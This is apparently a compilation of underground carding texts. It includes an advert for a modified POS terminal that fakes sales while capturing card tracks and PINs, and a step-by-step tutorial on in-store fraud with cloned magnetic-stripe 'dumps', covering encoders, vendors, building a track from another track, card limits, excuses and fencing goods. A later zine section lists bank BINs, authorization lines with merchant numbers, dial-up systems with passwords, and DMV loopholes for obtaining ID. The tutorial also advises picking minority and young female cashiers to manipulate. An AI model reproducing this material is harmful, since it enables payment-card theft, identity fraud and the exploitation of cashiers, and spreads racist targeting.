+Descriptions: +This machine can Store track 1/2 along with pin are stored and time stamped.It got options to say +approved, communication error, declined, unknown error and INSUFF funds. +This POS Machine can process both debit and credit cards, machine will never communicate with the real +bank server,machine is not physically tampered, just software was modded .It cannot process real +transactions, it will fake the actual transactions,gives you receipt and stores t1&2+pin,which you can +download later on your pc. +Available Options: +[-]Machine can process both Debit and Credit cards. +[-]Can say approved, communication error, declined, unknown error and INSUFF funds. +[-]You can add TIP to the sale options. +[-]You can limit the machine not to process more than X number of transactions. +[-]Can customize the Merchant receipt and customer receipt on your own +[-]Data is 3DES encrypted, only with a valid key can able to decrypted it (ON/OFF feature available) +[-]All the passwords,approval codes,MID,TID all can be changed from settings menu +[-]All currency's are accepted on pos. +[-]All pos's will come with necessary cables for a success functionning. +Dumps Tutorial: #1 +Everything you wanted to know about instore carding +Introduction: +So youre interested in trying out instore carding? Instore carding is one of the fastest ways to get money. +But you will need to keep your head on straight for this. As you should with every operation you go out to +do. This tutorial will tell you the ins and outs of instore carding. Feel free to +distrobute this as much as you want. +For the beginners: +Youre obviously reading this because you either A. Want to learn how to instore card or B. Want to see if +you can find anything you are not aware of. For people who chose A. You should have atleast some prior +knowledge of credit cards before you try instoring. If you do not that is ok too, just keep reading the +tutorial and by the end of it you should be fine. The most important thing about instore carding is how +you *Take the part* of the identity youre *Playinig* as. If youre going into a store looking to come out +with $3-5k worth of electronics dressed in your normal apparel and being nervous, think again. You need +to dress up and act like a person who would look like they could buy these items any day of the week. +The first time youre going to be nervous ofcourse, its natural to be nervous the first few times. But with +time and past experiences to look back on, it just gets easier as you go on. +Dressing the part: + +This should come natural to most people out there. To buy something expensive you need to make it look +like you can buy these items along with acting like you can (below). For your first operation i suggest +should include you going into any of the clothing stores listed below and buy a decent amount of quality +clothes. I cannot stress enough how quality plays a part in dressing up. Buying a sweater in walmart and a +sweater in banana republic could determine the difference between getting out with your goods or running +out of the store. Along with clothing you might want to buy some jewelry or a very high priced watch. If +a cashier suspects something is up, seeing some classy jewelry or a watch could also help reduce the +suspicion. +Clothing stores are usually never uptight with purchases of clothing so that is why I suggest going there +first to get some quality clothes. You can be dressed as you want in there and it wont matter. When you +buy the new clothes, put them on in a restroom and then continue your activities on a higher priced basis. +Acting the part: +This area will come hard for some but easier for others. Prepare yourself before you go in with things you +might say. If youre going into a store to +buy smaller items ($800 and below) , this usually not hard to accomplish. But for larger items you should +act as if you can afford these items at any time of day. Acting stuck up in a sense can accomplish this. +Other than that, dressing the part is the other area that helps you present yourself as a person of wealth. +Beginning: +Before you go out there and start instoring you will need the following items. +Card reader/writer - Youre going to have to (in most cases) need a card reader/writer to write new dumps +on your cards. Especially if you want to re encode your cards and go out. The only case where you would +not need this is if you were buying plastic from a vendor who offers to encode the dumps for you. For a +reader/writer I highly recommend the MSR-206. It is the most popular encoder out there. You can buy +them from +Price: $200 $640 +Computer/Laptop (Preferred) - To be able to encode your dumps (later on) you will first need a computer +to hook your card encoder up to. Using a desktop is fine but if you come into any problems with your +dumps which is going to happen, you will have no way to re encode your plastic. You will have to drive +home and re encode there. But if you have a laptop, you can bring your MSR with you and just hook it up +and re encode while youre in your car. Doing this will save you gas, and time. +Price: $600 to $2400 +Power Inverter - This is a very handy tool that youre going to need for this and you will probably find +yourself using for all other types of things. +The MSR requires a power source so buy or card one of these. If your laptop battery gets low aswell +which will sometimes happen just hook it up aswell. I found a very good one at BestBuy for $80. It +covers up to 800 watts (400 watts each plug). +Price: $80 +Plastic - I have seen all sorts of ways to obtain plastic. From stealing others and using those to buying +them from a vendor. You DO NOT want to steal anyones credit cards and start using those. And you do +not want to re encode your own credit cards. Im sure it makes sense to do so but over time if you start +using your own credit card, the credit card companys are going to see the name being used and will surely +contact you about these occurances. The best bet is to buy plastic from a vendor. Think about this too. +When buying plastic, get atleast 2 cards with the same name as your novelty. It will save money on new +novelties and give you a higher chance of walking out with your merchandise. + +Dumps - The most important item of this whole operation. What would you do without dumps? Nothing +thats what. I highly recommend snifferhack or linx101 for dumps. They supply the best quality on dumps. +I have over 7-12 different dump vendor friends and I still stay strong with these 2. Now depending on +what youre planning on getting out for your first op will determine on how much you will need to spend +on dumps. I would not worry about spending for now. As soon as your op is over you will see that you +have well made your money back from this. +Wallet - Some people may think that putting the plastic and novelty in your own wallet is not a bad idea. +But the truth is that it is probably one of the biggest problems that could arise if anything was to happen. +Keeping your false information and your real information seperate is a necessity. If you have any sort of +personal contact information on you when carding I would suggest dropping it off in your car. +Optional Items - +Fake ID - HIGHLY RECOMMENDED but is not always needed. Most of the time for large purchases +cashiers will ask for an identification that matches the plastic. There are numerous vendors out there who +provide a novelty service that will fit your needs. Getting a state that is semi close to you is ideal in this +situation. +Anonymous Phone - This is optional to have, I have used Chrome's dumps the most and he checks the +dumps before sending so that all are valid. His dumps work 8/10 times on average. So if one card does +not work I simply hand them another card with an excuse as to why that card was not working. When +using a phone merchant there are two ways of authorizing a card. Some people think that charging a $1 or +$1.50 on the card will not kill the card as many businesses use a $1 or $1.50 charge as a pre-authorization +to check and see if the card is valid. Others prefer charging a random higher amount to make it look like a +legit purchase. Either way, its up to you how would want to check it. +Serial to USB Converter - Smaller laptops may not come with a serial port to connect your encoder to. If +this is the case you will need to buy one of these. +Price: $15-$25 +Newskin Bandaid Liquid - You might be asking yourself "What would I do with this?". Well, if you +really want to be protective you can put some newskin on your finger tips so no traces of fingerprints will +appear on the plastic if any misfortune was to happen. +Planning: +Planning out what youre going to buy before you buy it would be a nice thing to do. It saves you time +thinking of what you need or might need. +Also think about this. If youre main goal is to get a hefty sum of money, you should checkout ebay to see +what sells for a high percentage. Usually gift cards to popular stores get high amounts back because they +are just like cash. But just double check ebay. +If youre going to do an instore op for your own personal pleasure then you really dont need to make a list +because you should already know what you want to get. Or you can look around in the store and choose +what you want. +Taking care of business: +Before hand I always like going to the bathroom. It makes the carding situation a bit more easier if you +get nervous. You do not want to get caught and be remembered as the kid who shit his pants. That is if +you do get caught which odds are you wont if you follow these instructions. + +Destination Safety: +Choosing a location to instore is not very hard. The internet has a vast amount of websites that have store +locators. So find your subject mall or store and do a search to see whats around you. Here is a very +important rule to follow by. Do not do anything where you live. Or in a more common way of putting it. +Dont shit where you live. Find a store thats atleast a good half hour drive away from you and is atleast +two cities over. +Some people choose to use fake license plates when entering your destination for carding just to add that +extra level of security on in case a camera catches the car that drives away. This is ofcourse optional, but +it doesnt hurt to put more safety on. Just dont speed away or anything that could get you pulled over. +Parking - When parking your car, make sure you park for out so no camera will catch your license plate. +It will be worth the extra walk when youre walking out with your merchandise. +So now you have everything you need to get started. Youre prepared for the best and the worst situations +to come. +The first time you go out you should expect some nervousness to come even before entering one of the +stores listed below. The most important thing to do is to stay calm and act natural. The more suspicious +you act, the more the cashier is going to suspect something is up. I do not recommend taking any drug or +alcohol to calm yourself down. You need to look calm and natural while being alert to your atmosphere at +the same time. +Anatomy of a dump: +B41111111111111111111^LASTNAME/FIRSTNAME^060910100 000000000000000000 +41111111111111111111=0609101000000000000000000000 +B - Identifies to the POS system that your card is a bank card +4111111111111111 - Credit Card Number +Lastname - Lastname of cardholder +/ - Seperater +Firstname - Firstname of cardholder +06 - Experation Year +09 - Experation Month +101 & Beyond - Bank data +Now some vendors will only sell the second track. So that leaves you with trying to figure out how to +write track1. Most stores do not check track1 so it is not the most important thing. But to be safe I always +include track1. Here is an example of what you will need to do. It is very easy. +4111111111111111=060910100000000000000 +If you havent noticed, track2 in most cases is just like track1. To begin making track1, add a B that will +indeicate its a Bank card. +B4111111111111111=060910100000000000000 + +Then, youre going to want to change the = to a +^lastname/firstname^ . +B4111111111111111^LASTNAME/FIRSTNAME^0609101000000 00000000 +And finally, youre going to add six zeros at the end of the dump. +B4111111111111111^LASTNAME/FIRSTNAME^0609101000000 00000000000000 +And thats your dump. Like I said its not hard to create track1 from only having track2. If you soley buy +from BadB (soon ccoming back Smile) and linx,Script,Ryden or sniffer you will not have to do this. +Software to encode the dumps - I recommend TheJerms software. It is very self explanatory. +Types of dumps: +People ask me all the time about using generated dumps and if theyre good. I would not use generated +dumps. Most of the time they will only work correctly with a certain Bin. And there is a 15% less success +rate than using other types of dumps. You might as well use quality dumps in your locations you choose +so people will not remember you instead of having errors come up and your face gets noticed more easily. +The best quality dump you will probably find are skimmed dumps. Skimmed dumps mean that the actual +card was swiped onto a portable Mag Stripe reader. Therefore, using these you know you will have all of +the correct information for track1 and track2. +Hacked dumps are usually taken from databases by you guessed it, hackers. The quality on these are the +normal quality thats out there. +Dump types and limits: +I will only discuss so far visa, discover dump limits and a word on amex dumps as I have not encounted +any use with mastercard dumps. +Visa Classic - These types of dumps are usually the cheapest to buy from a vendor. I have heard that on +average you can get $500 on these types of dumps. But I have been pulled atleast $800 on them. Visa +classics have a balance limit of $500 to $3,500. Although the most I have been able to get off of a single +classic is $2,600 before an error occurs. +Visa Gold - One step above the classic, These limits start at $3,500 and can double as the cardholder +gains good credit. With these you can make higher amounts of purchases. +Visa Platinum - Visa platinum dumps are for the larger purchases mainly. On a good day you can pull off +anywhere from $3,000 to $6,000 . +Visa Signature & Business - Signatues are said to have no limits. So for us that means these have the +highest limits available. People have said to have gotten anywhere from $5,000 to $20,000 off of these +types of dumps. +Discover - I have not used these that much in my past but from what I gathered you can get anywhere +from $1,000 to $5,000 on these in one purchase. Using these dumps for multiple purchases will most +likely kill the dump before you get past either of those limits. Almost all discover cards begin with a +balance of $10,000. +Amex - I have not used these dumps. The reason to that is that you need the correct CVN to complete the +transaction. It is not embossed, but printed onto the plastic. So you cannot re encode amex dumps. If the + +CVN is not correct when entered, you will automatically get a call for authorization. +How long dumps last: +This question no one can answer. You might be able to make a good prediction of how long they will last +if you think of time and the dump type. For instance. If you have a classic dump, its 11:30 AM and you +make a variety of small (Under $20) purchases. Odds are youre going to get that card to last a lot longer +than a classic dump thats doing $300 purchases at 7:30 PM. Think of the cardholders work hours. They +will usually be 9 AM to 5 PM. That is when their card is idle so to speak. +Choosing your cashier: +This is probably one of the more fun things to do while instoring. Usually 90% of the time, Minorities +and Younger Girls make the best choice for cashing out. Minorities include, Blacks, Mexicans, and +Asians if you were wonderings. The reason you want to choose these types for your cashiers are because +they are usually the easiest to manipulate. In some cases you are going to have to use a normal person to +cashout. But try not to make it a habit. +Interactions with the cashier: +In order to safely get your items out of the store successfully, you will need to know how to interact with +the cashier. To in a sense manipulate them. When you bring your stuff up to the cashier act normal. If it is +a large amount they might say something nice to you mentioning the amount of merchandise you are +buying. Just play with it and make them feel good aswell. If you make the cashier not feel comfortable +they will think something is up if any error happens. Which will sometimes if you are planning on doing a +lot of instore. +Errors and Excuses: +As I was saying above, there are going to be errors now and then. Now most are very easy to talk your +way out of. But in some cases youre going to need to know when you try and grab your novelty and card +and just run. That will most likely not happen if youre only doing this a few times but for people who are +planning to do this more often it is most likely going to happen atleast once. I have listed below a few +common errors and how to handle them. +Optional Pre-Excuse - LWAI brought this excuse method to a lot of peoples attention and it is a very +good idea in most cases. Making the cashier already think that the transaction will not go through so they +are not surprised by the error, which makes handling the situation much easier. Saying something as easy +as *I hope I have enough to cover this* or anything around those terms is good. +Declined - Once you spend and spend on a good dump there has to be an ending point. Usually with +dumps that will not die this is the final step to completing it. Hopefully you will have another card on you +to hand the cashier. If you don't thats fine too. +If you have another card - Oh, I thought that was going to happen. Here try my other card. If you do not +have another card - I will be right back. I'm going to go get my check book / go to the ATM. +Call For Authorization - This one can be tricky if you do not have the right cashier. This is something you +DO NOT want the cashier to do. A call for authorization is basically the store calling the bank or the +stores authorization center in order to confirm that it is the actual cardholder making the purchase. If this +happens just stay calm. +If you have another card - I don't have that much time, Ill call the bank later. Try my other card. If you do +not have another card - I don't have that much time for this Ill call my bank and come back tomorrow. + +If they persist on making the call, put your hand out as if they were going to give you your plastic back. +Doing this tends to put some stress on the cashier as to whether or not give the card back to you. They +usually will put the card back in your hands. +Do Not Honor - This will happen every now and then and is probably the easiest to overcome. The +cashiers will sometimes just ask you if you have another card. +If you have another card - Hand them the card and say you'll call the bank about that one. If you do not +have another card - Oh, I will call my bank about that tomorrow (then leave) +Those are the most common problems you are going to find. Of course there are more error codes. There +are about 50 of them. But by the time you manage to talk yourself out of these you will have enough +experience to talk yourself out of the rest. +Selling your items: +There are a vast amount of ways for you to liquidate your items. The best way to do so is on ebay. I am +not going to go into a large description because then this tutorial would change to how to sell your items +or scam on ebay. You can either buy an account from a vendor or get a B&M bank account and create +your own. I do not suggest using your own ebay account. A lot of people have in the past and even if a +good amount havent been caught, you do not want to be that small percent that does. +Here is another area that can be done in a lot of ways. I will tell you to not put the money in your legit +bank account. If you were thinking that, you should take a minute and think again. You could store your +money on an electronic bank account service such as egold, or webmoney. Or if you want +more control over your money, you could keep it all in a well hidden safe. Using an electronic bank +account instead has a higher security rate. As if anything was to happen to you involving LE, odds are +they will not find your information for that account. Which means they would not have access to your +funds because they would not know it exists. +End Notes: +Thank you for taking your time to read this tutorial. I hope it was worth your time! I also hope that +everyone who is inspired by this reply with any words or questions they would like to say. Good luck to +all of you! +Merchant Codes: +Quote:00 Approved +01 Refer to Card Issuer +02 Refer to Card Issuer, special condition +03 Invalid Merchant +04 Pick up card +05 Do not honor +06 Error +07 Pick up card, special condition +08 Honor with identification +09 Request in progress +10 Approval for partial amount +11 Approved VIP +12 Invalid Transaction +13 Invalid Amount +14 Invalid card number +19 Re-enter transaction +21 No action taken + +30 Format Error +41 Lost card Pick up +43 Stolen card Pick up +51 Not sufficient funds +52 No checking account +53 No savings account +54 Expired card +55 Pin incorrect +57 Transaction not allowed for cardholder +58 Transaction not allowed for merchant +61 Exceeds withdrawal amount limit +62 Restricted card +63 Security violation +65 Activity count limit exceeded +75 Pin tries exceeded +76 Unable to locate previous +77 Inconsistent with original +78 No account +80 Invalid transaction date +81 Cryptographic PIN error +84 Pre-authorization time to great +86 Cannot verify PIN +89 MAC error +91 Issuer unavailable +92 Invalid receiving institution id +93 Transaction violates law +94 Duplicate transaction +96 System malfunction +Dumps Tutorial :#2 +INTRODUCTION: +C=The *use* of our credit system for personal gain & financial freedom! +H=The practice of accessing *secure* computers with innovative techniques/skill. +I=Assuming or establishing a *new* guise by "creating" an identity on paper. +P=The know-how and interest in the telecom industry and the services it provides +Hi-?! +Issue two already! I just finised #-01 about a week ago, and already I feel +I have enough text & information of interest to warrant a quick follow-up to +#-01! ....so here it is, #-02! I hope #-01 has provided those who have read it, +something to think about and/or "work on". If not, well then perhaps this one +will. If not, then perhaps a monastery or convent would be a better place for +the likes of you!! +II.> PART 2- +\|/ +?[>*C*H*I*P*=>! + +*C* - CARDING> /|\ +Intro: +Below are as many BIN's as I could round up. Each one is listed according to +the Banks ID No. (BIN) - which are the first 6 nos. of a CC. (Credit Card). +Of course, the first no. indicates a Visa (4) or a Mastercard (5). Bin's aren't +all that important to know, but can be if you NEED to know the name of a bank +that issued the CC no. you have. +So FYI and bemusement, here's that information- +BANK IDENTIFICATION NUMBERS: +^^^^ ^^^^^^^^^^^^^^ ^^^^^^^ +~~VISA BINs~~ +^^^^ ^^^^ +*4000-4999* +401903 = Bank of America +402400 = Bank of America +402402 = Bank of America (Gold) +403200 = Household Bank +4040?? = Connecticut National Bk +4040?? = Wells Fargo +4050xx = 1st Interstate +4052?? = First Cincinnati Bank +405209 = First Nationwide Bank +4060?? = Navy Federal Credit Union +407000 = Security Pacific Ntl. Bank +407129 = Colonial National Bank +411427 = Chemical Bank +412174 = Signet Bank/Virginia +412185 = Citibank/Signet? +41235? = Commerce Bank +4128xx = Citibank +416818 = Great Western Bank +4131?? = State Street Bank +4170?? = Beneficial National +417129 = Colonial Bank +4188?? = Ohio Savings & Loan +4211?? = Chemical Bank +4215?? = Marine Midland +422591 = Chase Manhattan +4226xx = Chase Manhattan +4231?? = Chase Lincoln 1st Classic +4232?? = Chase Lincoln 1st Classic +4237?? = Cicero Credit +4241?? = Natl. Westminester Bank +425043 = First Chicago Bank +425330 = Bank of N.Y./Consumer Edge +425451 = Chemical Bank +4262xx = Corestates Bank of DE +427138 = Citibank + +4302?? = HouseHold Bank +431068 = Bank-Layfayette/Imprl Svg's +4312?? = Barnette Credit +431301 = Valley Federal S&L +431663 = Glendale Savings & Loan +431772 = Gold Dome +4321?? = Mellon Bank +433213 = Bank of Indiana +433222 = Far West Virginia +4349?? = First Bank of America +436800 = Sovran Bank/VA +438733 = Bank One +438760 = More Bank +440121 = Gary Wheaton +440862 = Charleston of Indiana +441712 = Mellon Bank +442813 = Bank of Hoven +442843 = " " " " +44288? = Colonial National Bank +443600 = Security Bank of Monroe +4448?? = First National Bank - RI +46165x = First Interstate Bank +4626?? = Indiana National Bank +4646?? = Mercantile +4672?? = Mercantile Bank +467362 = First National Bank; +467807 = Home Fed Svg's/1st Card +467808 = Home Fed Svg's/1st Card +468120 = Harris Trust Savings +4696?? = Credit of Kansas +4718?? = Colorado Bank +4734?? = Madison Bank +480012 = Valley Federal S&L +4811?? = Bank of Hawaii +4825?? = First Wisconsin +4897?? = Village Bank of Cinn., OH _________ +/ Here are \ +4929?? = Barclay Bank/DE | what the | +^ | holograms | +| | SHOULD show!| +| \_____ _____/ +*BIN* = #### ## (1st 6 nos.) Y +| | +| _____________________________|______ +| [ | ] +^ | MASTERCARD INTERNATIONAL___v____ | +| | [ v+===\*] | +/--<+-->| 5555 1234 5678 9012 [ | I|] | +| | ^^^^ ^^ ] Q I|] | +| +==>| 6512 11-91 TO 11-92 [ /|\ I|] | +| | | ^^^^ [_/^\_ I=] | +| | | JUSTIN CASE MD [________] | + +| | | | +| | [____________________________________] +| | +| *-==>IBN* = #### (above cardholder's name) +| | +| | +A>|M/C's | +==v===== v +1st- X IBN. +###### X #### Bank/Institution Name +^^^^^^ ^ ^^^^ ^^^^ ^^^^^^^^^^^ ^^^^ +5000-5399 +========= +5031?? = #? -Maryland Bank MBNA +5127?? = 1015 -? +520400 = 1006 -Security Pac Ntl Bk +521142 = 6142?-Chemical Bank +521531 = 6207 -Marine Midland +521795 = 1033?-Manufacturers Trust +5218?? = #? -Citibank N.A. +523080 = #? -Harris Trust Svgs +5233?? = 1226 -Huntington Bank +524200 = 6066 -Chevy Chase F.S.B. +5250?? = 1260 -? +525400 = #? -Bank of America-ca +525402 = #? -Bank of America-pa +5263?? = 1263 -Chemical Bank +5272?? = #? -Connecticut Ntl +5273?? =p #? -Bank of America +527706 = #? -FIB +52820? = #? -Wells Fargo +5286?? = #? -Chase Lincoln 1st +5286?? = 1286 -Home Fed Savings +528707 = #? -Valley National Bank +529107 = 1001 -Signet Bank/VA +529801 = #? -Bank One +5317?? = #? -Norwest Financial +5323?? = #? -Bank of New York +532903 = 6017 -Maryland Bank; MBNA +532956 = 6017 -Maryland Bank; MBNA +539655 = 7462 -Universal Bank/AT&T +539855 = 7462 -Universal Bank/AT&T +5400-5999 +========= +540126 = 6017 -Valley Federal S&L +540193 = 8084 -Fidelity Investors Bk +541037 = 6037 -Wells Fargo NA +541065 = 6785 -Citibank NA +541085 = 6785 -Citibank NA +541116 = #? -1st Financial/Omaha +541169 = 1169 -1st Financial/Omaha +5412?? = 6037 -? + +5414?? = #? -Ntl. Westminster Bank +5415?? = #? -Colonial National Bk +541586 = 1586 -HouseHold Bank +541711 = 1711 -? +541919 = #? -FIB +541933 = 1933 -Bank of Hoven +541934 = #? -Berthoud Ntl Bk +542096 = #? -Colonial Bank +542143 = 2143 -? +54224x = 1049 -MHT +542418 = 1065 -Citibank +5432xx = #? -Bank of New York +5455?? = #? -PSFS +5464?? = 1665 -Chase Manhattan +546598 = " " -Chase Manhattan +5601?? = 1352 -FIB +5678?? = 1207 -Marine Midland +591210 = 6282 -Wells Fargo +xx= All nos. in series are that bank's. +??= Unsure of full IBN/BIN no. +B> - Authorization Centers - ("AC") +Intro: Authorization Centers are located throughout the country and are in just +about every financial institution that is involved in the distribution and/or +issuance of credit cards. Of course, Visa and M/C have some as well. +Citibank, First Interstate Bank and Bank of America all have their own AC's +available to their merchants. There are however many other AC's that provide the +same types of services to their merchants. It is the merchant who is 'really' +providing the services though. It is the merchants responsibility in most cases +to determine that a credit card is valid. On top of that they are also even +offered a whole $50 if they assist in the conviction of anyone suspected of +using a stolen/forged card. $50!! Hardly worth it, so most don't even try.... +One of the quickest ways a card is checked is by accessing an AC through a +card reader. Verifone is perhaps the largest mfg. of these devices, which are +used by most retail stores or restaurants for CC verifications. +The telephone no. that is called using one of these card readers is the +first one in which I've listed below. You can also log onto this "carrier" via a +a modem, but I've yet to figure out what the necessary input is to utilize this +service on my computer. A touch tone phone suffices however, and the required +input is listed below for using this particular AC (Authorization Center). +One other thing to note here is that whenever you are at a store/merchant +and using a shady (at best) card, be especially alert to the merchant and/or +cashier when they are getting verification of the transaction. If they use +the telephone and voice in the request for the authorization, then listen +for "Code-10", and if you hear them say this at any time- GET THE HECK OUT!! +If they use a card reader for the transaction and get something like "CALL + +CENTER" on the read out, then remain calm and ask what the problem is, and if +at anytime they are out of sight or on the phone with the center for +any prolonged amount of time, then again- GET OUT OF THERE!! +A "code-10" is a merchant's signal to an authorization center that they are +suspicious of the card user. If you are using an AMEX, then run out of there +twice as fast, because AMEX calls the police from their authorization center. +V/MC don't usually call the police, but AMEX will use stall tactics while the +police are on the way. (One way is to ask to speak with you and then ask you +some rather lengthy detailed questions, like primary cardholders name, SSN & +Mother's Maiden). You can always just look out the window and exclaim, "Hey! +someone's stealing/towing my car!" and then leave pronto!.... +** Use the following telephone nos. before going into ANY store to use a card. +They are worth the extra minute or so to be sure that the card is still valid! +1>. +800/228-1111 = On-Line Auth. Center (300baud)/Touchtone Ok too. +Merchant No.#Card No.#Exp.Date#Amt# **push the "#" after each entry** +(Merch No.=A 16 digit-#; 1st no. is 4 or 5 & can often be found on carbons +just above the merchants name.) +2>. +800/228-2211 = This is the voice authorization number of the same group +who operate the one above. I am fairly sure that these two are operated by +M/C and Visa, and I do know that the merchant nos. that work on one, also +work on the other. This AC, is also useful for obtaining a BIN no., and/or +the issuing bank of a particular credit card. Just ask the verification op. +for merchant services and she will connect you to their information dept. +3>. +800/554-2265 = Bankcard Auth. Ctr. +For MasterCard: 1067#52#10#CardNo#Exp#$$$$# +For Visa: 1067#24#20#CardNo#Exp#$$$$# +4>. +800/528-2121 = American Express Auth. Ctr. (Amex only) +Live ops! - Give: (**Merch#+card#+expdate+amt) **=5041035528 +Merch. No. is for: Popolos Ristorante; 8115 Melrose LA,Ca. 90069 +5>. +800/327-3584 Authorization Center for Visa & M/C +***** Merchant No. format is: 101 ### ###; #= unknown no. +6>. +800/645-9120 Merchant Service Center for Citibank; NA +****** Merchant No. format is: ### ### ### ### (the one I had is no longer +[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] +Glossary of terms used in the preceding text file. +- Authorization Center = Voice and/or Data terminal which gives merchants +varying "approval codes" on purchase requests. Some also provide info such as +BIN No. and Bank Name of a particular card. +- Bank Identification Number = Issuing bank's identifier. This number is + +assigned by the FDIC, I think. The No. can be found on Visa's (unraised) +just above the CC number. Some larger banks will have several BIN's, because +they own several smaller financial institutions that issue credit. +Choice Visa is one example. They are owned by Citibank, but have there own +seperate BIN. Another example is First Card, which handles Home Fed Savings +credit accounts. +- International Bank Number = Bank Identifier on a national level. The +number is used by various merchants to verify/approve a cardholder when they +have placed a telephone or mailorder request. It is the 4 digit no. just +above the persons name, and is only found on M/C's (raised, 'usually' starts +with a 1,6,7 or Cool & on Amex cards (unraised, usually starting with a 6). +Though not an absolute, experience has shown that IBN's starting with 6,7 or +an 8, are usually preferred accounts. IBN's that begin with a 1 or 2 are +usually found on classic accounts. (see list above) +- CV = Classic Account; -these two letters can be found on most Visa cards +that are "Classic Accounts". They usually have a credit limit of some- +where between $500 to $5000+, though some can go up to $10,000 for long term +customers. +- PV = Preferred Acct. or "Gold Card"; -usually limits of 5,000-10,000+. These +cards are 'usually' found on Gold or 'preferred Visa Cards, and are worth +their weight in 'gold' as well.... Some can go up to $40,000 or more!! +++Any additional articles or noteworthy texts to be submitted for inclusion +in the future issues of *CHIP*, should include a handle &/or method of contact +for the author. Though not required, this will help in verifying the info & +assure a timely publish date. +Our method of contact is simple. Call 800-755-3493, press 9657 before end of +greeting and give us some idea of what you know or have access to and we will +consider your request. The only other method we feel safe with is via a typed +letter sent to: *JC/CA* 15445 Ventura Blvd. #128; Sherman Oaks, CA 91403. We +need more up to date H/P info since this is not our best subject and since +there are many others more knowledgable in this field than we are... So let us +know! ...Otherwise we may change *CHIP* to CIA! & become Anarchist!... then +again, it's probably too late for that, since we do as we want anywayz..-JC/CA>. +III.> PART 3: +\|/ +?[>*C*H*I*P*=>! +/|\ +*H* - HACKING> +Intro: +Hacking Numbers & Carriers! These may also be added to the EXTENDER.DAT +files of most Hacking/Phreak programs, when reliable carrier no(s) are +needed. +* Telephone No= Pwd &/or Locale * Telephone No= Pwd &/or Locale +------------------------------- ------------------------------ +206-863-0015= ? 800-325-1171= ? +206-863-3963= ? 800-325-1340= ? + +206-863-3700= ? 800-325-1341= ? +206-863-0426= ? 800-325-1342= ? +206-863-1150= ? 800-325-1436= ? +206-863-1183= ? 800-325-1401= ? +208-772-6134= ? 800-325-1471= ? +619-723-8996= ? 800-621-3224= ? +919-323-9888= ? 800-621-3592= ? +214-263-3109= ? 800-621-3678= ? +206-825-7206= ? 800-621-3679= ? +206-825-7598= ? 800-228-1111= ?M/Card-Visa +206-825-7621= ? 800-334-4000= ?Message system +206-825-7781= ? 212-370-4303= Cosmos NY +206-825-6132= Try ctrl-x for prompt 313-855-0203= CosmosMI:ONNERR +206-825-7905= ? 213-892-7211= Compuserve +206-825-9000= Montgomery Ward 213-355-5241= Electronic News +206-833-5329= Wont connect properly 800-555-8677= Ma Bell +206-825-6234= Oil Company 800-424-9440= Bank +206-931-4879= Auburn High 213-932-8294= Secret Service +206-872-4690= Kent High 405-332-9998= Belle Co-puter +414-476-8010= Milwaukee High 713-241-6421= Shell Oil +206-771-6551= Tacoma School.P/w=VAXE 713-526-0149= Hospital +206-825-7720= Compuserve 913-343-1042= Calling card +312-499-2100= Sears 502-588-6020= Uof Louisville +617-683-2119= Hospital 502-588-6036= " " " +800-424-9494= Telenet 213-417-8997= TWA +800-421-2123= ? 800-828-6321= IBM Computer +800-558-0001= AGRODATA 206-828-3598= Microsoft +206-357-7350= Ctrl-data-publishing 800-526-3174= RCA Mainframe +414-354-0010= T.Y.M.E. Corp. 312-937-1210= ? +202-553-0229= PENTAGON 206-833-6352= ? +202-697-0814= PENTAGON 206-833-6364= ? +304-376-2488= Savings & Loan 202-553-0229= T.A.C +313-964-2018= Charge card Association N/A-950-1288= AT&T Info Service +206-833-6133= ? 206-833-6134= ? *P/w For Milwaukee High GNIK, Code:4,71 +800-522-5465= Lab Link **P/w For Ma Bell 948DJU47R +202-694-0004 User Id= Cohen +=========================================================================== +==== +ABC East Coast feed 213 935-1111 +Try this # 206-825-2377, hit return a couple of times and you'll get ENTER +PASSWORD then hit ControL 'U' a few times then hit return. you in +simple.. Or try mashing keys until it says 'ART GAMBLIN - CHEVROLET'... +III.> PART 4- +\|/ +?[>*C*H*I*P*=>! +/|\ +I - IDENTITIES +Intro: + +DMVRULES.TXT +What the DMV would rather you DIDN'T know: + 10-01-90 +13.301a: +"...If the applicant is unable to provide a signature within the margin, the +application should nevertheless be accepted, and there is NO need to prepare +another application..." +13.301b: +..."Usual signature" means the signature the applicant uses when signing +letters, "checks", etc. It need not correspond exactly to the full name as shown +at the top of the application or photo document & and in fact, seldom will. If +the signature includes a nickname not shown in the full name, or if it differs a +lot from the full name, the employee should indicate "usual signature" in the +space at the top of application. +13.301c: ***important*** +If the applicant's, "usual signature" is "printed", it should be ACCEPTED on +the application. +13.307: Birth Date Verification +Any Driver license showing birth date is acceptable in lieu of a birth +certificate (bc). If the bc is unobtainable, certain other documents may be +accepted in lieu of the bc. The acceptability of other documents should "NOT BE +DESCRIBED TO THE APPLICANT" until it is reasonably ascertained that their birth +record is unobtainable. +The following ARE accepted forms of identification as listed in the +DMV Employees Driver License Tech. Manual: +<<< in order of preference.... their preference, of course! >>> +1>. Birth Certificate or any "certified Birth Record/Registration". +2>. Driver License, from CA. or an ID card issued by the State of CA. +3>. All other state Drivers licenses, Id cards, to include Military too +4>. Any foreign governments D/L and/or ID. Must have DOB listed on it. +5>. Passports, Visas, immigration/alien docs or reg. cards. w/ DOB. +6>. Dept. of Corrections or Youth Authority docs, signed by PA/CS/CAS. +7>. Driver Education driving permits & training certificates, w/ DOB's. +8>. Out of State ID cards -NOT necessarily issued by the state's DMV. +9>. US Census Records. Auth. by 13007.5 VC; ** contact Census Bureau ** +10>. School Cerification (form dl-48); used ONLY when all other forms of Proof +of ID have been exausted; *contact any local school to get rcrds*. This +is also an accepted form of ID for SSA (Social Security Administration). +** Note: +Tax forms are not accepted with any degree of certainty by the DMV. It's +always best to use what they see "thousands of time a day", since these docs +are usually less scrutinized. +If you have trouble getting the above docs, then just go to Nevada. In NV +they take almost every Type of ID known in the US. Included in what they will +accept are W-2 tax forms & 1099 gift-tax forms. Armed with one of these and a +baptismal certificate you can get a NV ID/DL with no problem, and on the same + +day as well. NV is one of the few states that accept Baptismal Certificates. +.... and Just'in Case you ddidn't know that, Bap. Certs. can be found at most +at most religious bookstores & supply stores, especially Catholic. +An added bonus is that they DO NOT fingerprint in NV. You also have the +option of having your ssn imprinted on the ID card, which is helpful for back- +up ID. You just tell them your ssn and they'll include it. One bad thing is +that there is no Exp. date on their ID cards, however there Driver Lic's. do +have exp. date's and are worth the extra "drive" around the city to get. The +best days to go are on Tuesdays or Wednesdays. +***Now here are a few additional points of interest to note for the heck of +it, so here goes.... 